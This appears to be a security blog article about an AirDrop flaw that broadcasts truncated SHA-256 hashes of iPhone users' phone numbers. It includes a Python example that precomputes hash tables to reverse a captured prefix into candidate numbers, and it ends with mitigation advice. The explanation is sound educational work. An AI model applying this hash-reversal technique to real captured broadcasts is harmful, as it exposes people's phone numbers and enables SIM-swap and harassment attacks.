Apple AirDrop Vulnerability Broadcasts User Phone Numbers to Potential Attackers
iPhone users who frequently use the AirDrop feature to share images, videos, or other files may unwittingly be broadcasting their phone numbers to people nearby. According to a recent Ars Technica report, a hacker would need to have a laptop and a “wireless packet sniffer” dongle to exploit the vulnerability. Armed with those components, a security researcher testing the proof-of-concept software designed to exploit the vulnerability was able to see “details of more than a dozen iPhones and Apple Watches that were within radio range” and use this information to obtain users’ phone numbers.
The vulnerability, it appears, is due to the way Apple and other tech companies attempt to make wireless discovery features easier and more convenient to use. These automatic discovery tools typically require some sort of exchange of information between devices—in this case, the phone sending files via AirDrop and the device receiving them. But in order to accomplish this, Apple devices with the AirDrop feature switched on end up broadcasting potentially sensitive data to everyone in the vicinity.
The good news is that while iPhones using AirDrop are effectively broadcasting the user’s phone number, the number is not sent in the clear, so it is not directly readable even by someone with the right hardware to capture it. What is broadcast is a hexadecimal “hash value” produced by SHA-256, a one-way cryptographic hash function designed by the NSA and standardized by NIST. Apple devices broadcast only a partial (truncated) SHA-256 hash of the phone number to make AirDrop’s automatic discovery feature work. Similarly, when a user turns on Wi-Fi password sharing on an Apple device, that device starts broadcasting SHA-256 hashes of the user’s phone number, email address, and Apple ID.
The bad news is that hashing, partial or not, is a poor safeguard for phone numbers. A hash is only hard to reverse when the input is hard to guess (a Bitcoin private key, or a passphrase of unknown length), and a phone number is not: within a single area code there are at most ten million seven-digit numbers, and a laptop can compute the SHA-256 of every one of them in minutes. An attacker can therefore build, once and in advance, a table mapping each possible number to its hash and simply look up whatever prefix the sniffer captures. Truncating the hash does not fix this; it only means a short prefix may match a handful of candidate numbers instead of exactly one, which is still a tiny set to check. According to the cybersecurity firm Hexway, which discovered the AirDrop vulnerability and demonstrated the initial proof of concept, an attacker can use the partial hashes together with one of these pre-compiled tables to figure out an AirDrop user’s full phone number.
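The precomputation attack described above, as an added illustration that is not Hexway’s proof-of-concept code or anything from Apple: it builds a lookup table from truncated SHA-256 prefixes to every number in a block of one North American area code, then reverses a captured prefix. The prefix length (`PREFIX_BYTES`), the choice to hash the number as a plain digit string, and the sample numbers are all assumptions made for the example; the page does not state Apple’s exact encoding or truncation length.

```python
import hashlib
from collections import defaultdict

# Assumption (not stated on the page): the advertised value is the first
# PREFIX_BYTES bytes of SHA-256 over the phone number written as a plain
# digit string. Apple's real pre-hash encoding is not given, so this is a model.
PREFIX_BYTES = 3


def partial_hash(phone: str, prefix_bytes: int = PREFIX_BYTES) -> bytes:
    """Leading bytes of SHA-256(phone): the 'partial hash' a sniffer observes."""
    return hashlib.sha256(phone.encode("ascii")).digest()[:prefix_bytes]


def build_table(area_code: str, exchanges, prefix_bytes: int = PREFIX_BYTES):
    """Precompute partial_hash -> [candidate numbers] for every line in the
    given NANP exchanges (3-digit exchange + 4-digit line = 10,000 numbers each).
    A whole area code is exchanges 200..999, i.e. 8,000,000 numbers, which is
    cheap enough to build once on a laptop and keep on disk."""
    table = defaultdict(list)
    for exchange in exchanges:
        for line in range(10_000):
            number = f"{area_code}{exchange:03d}{line:04d}"
            table[partial_hash(number, prefix_bytes)].append(number)
    return table


def recover(observed_prefix: bytes, table) -> list:
    """Reverse a captured partial hash to the list of candidate phone numbers.
    An empty list means the number is outside the precomputed block."""
    return table.get(observed_prefix, [])


def collision_stats(table):
    """How ambiguous is the reversal? Returns (distinct prefixes seen,
    prefixes shared by more than one number). Truncation causes the second
    figure to be non-zero, but each collision is still only a few candidates."""
    ambiguous = sum(1 for cands in table.values() if len(cands) > 1)
    return len(table), ambiguous


if __name__ == "__main__":
    # Constructed demo: one exchange (10,000 numbers) so it runs in a second.
    table = build_table("415", exchanges=[555])
    victim = "4155551234"            # constructed target, not a real subscriber
    sniffed = partial_hash(victim)   # what the packet sniffer would capture
    print(sniffed.hex(), "->", recover(sniffed, table))
    print("prefixes, ambiguous prefixes:", collision_stats(table))
```

The whole attack is offline work: the table is built once, and each captured prefix costs a dictionary lookup. The lesson generalizes beyond AirDrop: an unkeyed, unsalted hash of a value drawn from a small, enumerable space (phone numbers, email addresses from a known domain, short IDs) offers no confidentiality, however strong the hash function itself is.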
While an interesting discovery, this isn’t what we’d call a code-red level event. First of all, phone numbers aren’t exactly state secrets, and even if you don’t like to give yours out, someone knowing your phone number is not nearly as much of an issue as someone knowing your passwords or your Social Security Number (though it is worth remembering that a phone number is the starting point for SIM-swap and SMS-based account-recovery attacks, so it is worth more to an attacker than it first appears). And secondly, the likelihood of a dongle-equipped, packet-sniffing hacker sitting next to you on your morning commute is fairly slim, although the attack is entirely passive: it needs no pairing, no interaction with the target, and leaves nothing visible on the phone. Still, the fact that this data is broadcast by a helpful feature that most people believe to be secure may be worrying to some Apple users.
All in all, while this likely isn’t the sort of thing that will impact everyday users, truly security-minded individuals may want to disable AirDrop and other features that rely on automatic discovery, since the broadcast only happens while those features are on. Most of us, however, will go on using features like AirDrop, though perhaps we will think twice before doing so on a crowded train, and be a bit more skeptical of strangers who call our number.